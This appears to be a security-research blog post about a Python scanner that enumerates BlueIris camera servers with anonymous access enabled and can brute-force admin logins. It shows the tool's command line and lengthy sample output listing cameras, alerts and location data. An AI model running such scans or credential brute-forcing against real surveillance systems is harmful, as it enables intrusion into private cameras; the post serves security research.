BlueIris Scanner

#web #security-research #iot

BlueIris Scanner

BlueIris Security is a software company that develops video security and webcam software to livestream data from your security cameras. After discovering a BlueIris webcam at a previous job, I started poking around with the web interface to see what I could discover when anonymous access was enabled. I wrote a simple scanner in Python that (assuming anonymous access is enabled) will run through various endpoints using their JSON HTTP interface and print out the results.

To learn how the interface worked, I read through the (beautiful) documentation on their website that details how the software works, how to configure it, and how the API is set up. Each command, the input parameters, and output are included in nice little tables.

When anonymous access is enabled, information such as camera names, CPU and memory stats, last software update, number of current connections, disk usage and capacity, and server uptime are included. While informational in nature, it can help illuminate the current environment more.

The scanner also has the ability to brute force credentials since traditional brute forcing tools (like Hydra) doesn’t support their unique login API. When files for possible passwords and usernames are provided, it will test each combination until a valid password is found.

Python Scanner

Link to the scanner on GitHub

Example

1
2
3
4
5
6
7
8
9
10
11
12
13
$ python3 blueiris_compromise.py -H http://0.0.0.0:80
[+] No paths to text file of usernames and passwords was passed in. Admin access will not be brute forced.

[+] Testing anonymous access...
[+] SUCCESS! Anonymous access is permitted
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": {"system name": "Home", "admin": false, "ptz": true, "audio": true, "clips": true, "streamtimelimit": false, "dio": false, "version": "4.8.6.3", "support": "8/24/2019 5:32:39 PM", "user": "Anonymous", "latitude": 30.000000, "longitude": -97.000000, "tzone": "0", "streams": ["CBR 512 kbps; gop 300, bframe 0", "CBR 1024 kbps; gop 300, bframe 0", "CBR 256 kbps; gop 300, bframe 0"], "sounds": ["airhorn.wav", "alarm-frenzy.wav", "alarm.wav", "alarming.wav", "alien-message.wav", "alien-tune.wav", "are-you-kidding.wav", "attention-required.wav", "blocker.wav", "decay.wav", "demonstrative.wav", "determined.wav", "doorbell.wav", "enough-with-the-talking.wav", "gentle-alarm.wav", "gesture.wav", "good-morning.wav", "hell-yeah.wav", "high-pitch.wav", "i-demand-attention.wav", "i-saw-you.wav", "job-done.wav", "just-like-magic.wav", "long-chime-sound.wav", "may-i-have-your-attention.wav", "munchausen.wav", "news-bringer.wav", "no-way.wav", "not-kiddin.wav", "oh-really.wav", "on-serious-matters.wav", "paranoid.wav", "pizzicato.wav", "police.wav", "pop.wav", "professionals.wav", "quiet-knock.wav", "robot-walking.wav", "served.wav", "sorted.wav", "springy.wav", "surprise-on-a-spring.wav", "system-fault.wav", "the-squeaky-wheel-gets-the-grease.wav", "this-is-it.wav", "warning.wav", "what.wav", "wiggle.wav", "will-you.wav", "you-wouldnt-believe.wav"], "www_sounds": ["airhorn.mp3", "alarm-frenzy.mp3", "alarm.mp3", "alarming.mp3", "alien-message.mp3", "alien-tune.mp3", "are-you-kidding.mp3", "attention-required.mp3", "blocker.mp3", "decay.mp3", "demonstrative.mp3", "determined.mp3", "doorbell.mp3", "enough-with-the-talking.mp3", "gentle-alarm.mp3", "gesture.mp3", "good-morning.mp3", "goodbye.mp3", "hail.mp3", "hell-yeah.mp3", "high-pitch.mp3", "i-demand-attention.mp3", "i-saw-you.mp3", "job-done.mp3", "just-like-magic.mp3", "long-chime-sound.mp3", "may-i-have-your-attention.mp3", "munchausen.mp3", "news-bringer.mp3", "no-way.mp3", "not-kiddin.mp3", "oh-really.mp3", "on-serious-matters.mp3", "paranoid.mp3", "pizzicato.mp3", "police.mp3", "pop.mp3", "professionals.mp3", "quiet-knock.mp3", "robot-walking.mp3", "served.mp3", "sorted.mp3", "springy.mp3", "surprise-on-a-spring.mp3", "system-fault.mp3", "the-squeaky-wheel-gets-the-grease.mp3", "this-is-it.mp3", "warning.mp3", "what.mp3", "wiggle.mp3", "will-you.mp3", "you-wouldnt-believe.mp3"], "profiles": ["Inactive", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5", "Profile 6", "Profile 7"], "schedules": ["Default"]}}

[+] Enumerating endpoints accessible with anonymous access...
[+] Command 'camlist' returned successfully:
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": [{"optionDisplay": "+All cameras", "optionValue": "Index", "FPS": 10.0, "isMotion": false, "isTriggered": false, "xsize": 3, "ysize": 2, "width": 1920, "height": 720, "audio": true, "group": ["ptz", "Cam6", "Cam5", "Cam2", "Cam1", "cam3"], "rects": [[0, 0, 640, 360], [640, 0, 1280, 360], [1280, 0, 1920, 360], [37, 360, 677, 720], [752, 360, 1280, 720], [1355, 360, 1883, 720]], "newalerts": 0, "lastalert": -1, "alertutc": 0}, {"optionDisplay": "+All cameras cycle", "optionValue": "@Index", "type": 4, "FPS": 10.0, "color": 0, "ptz": false, "audio": true, "width": 1280, "height": 720, "isEnabled": true, "isOnline": true, "profile": 1, "pause": 0, "isPaused": false, "isRecording": false, "isYellow": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 0, "nClips": 0, "nNoSignal": 0, "error": "", "isMotion": false, "isTriggered": false}, {"optionDisplay": "ptz", "optionValue": "ptz", "active": true, "FPS": 14.88, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 29, "lastalert": 3629572, "alertutc": 1681914410, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 1476, "nClips": 227, "nNoSignal": 2891, "error": ""}, {"optionDisplay": "My Camera 6", "optionValue": "Cam6", "active": true, "FPS": 14.88, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 2, "lastalert": 3462763, "alertutc": 1681910733, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 3522, "nClips": 288, "nNoSignal": 2635, "error": ""}, {"optionDisplay": "My Camera 5", "optionValue": "Cam5", "active": true, "FPS": 14.95, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 2, "lastalert": 3484058, "alertutc": 1681910737, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 5402, "nClips": 366, "nNoSignal": 2874, "error": ""}, {"optionDisplay": "Gate", "optionValue": "Cam2", "active": true, "FPS": 14.89, "color": 8151097, "ptz": false, "audio": false, "width": 2560, "height": 1440, "newalerts": 81, "lastalert": 3827063, "alertutc": 1681921237, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 14925, "nClips": 1059, "nNoSignal": 3168, "error": ""}, {"optionDisplay": "Dee's", "optionValue": "Cam1", "active": true, "FPS": 24.99, "color": 8151097, "ptz": false, "audio": false, "width": 352, "height": 240, "newalerts": 22, "lastalert": 3611960, "alertutc": 1681914402, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 9898, "nClips": 690, "nNoSignal": 343, "error": ""}, {"optionDisplay": "Overview", "optionValue": "cam3", "active": true, "FPS": 25.67, "color": 8151097, "ptz": false, "audio": false, "width": 704, "height": 480, "newalerts": 0, "lastalert": -1, "alertutc": 0, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 0, "nClips": 458, "nNoSignal": 322, "error": ""}]}
[+] A valid camera name will be used in some subsequent requests
[+] Command 'alertlist' returned successfully:
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": [{"camera": "Cam2", "newalerts": 81...

Theme Pure | Powered by Hexo and Cookies I take no responsibility for anything on this site because that's too much work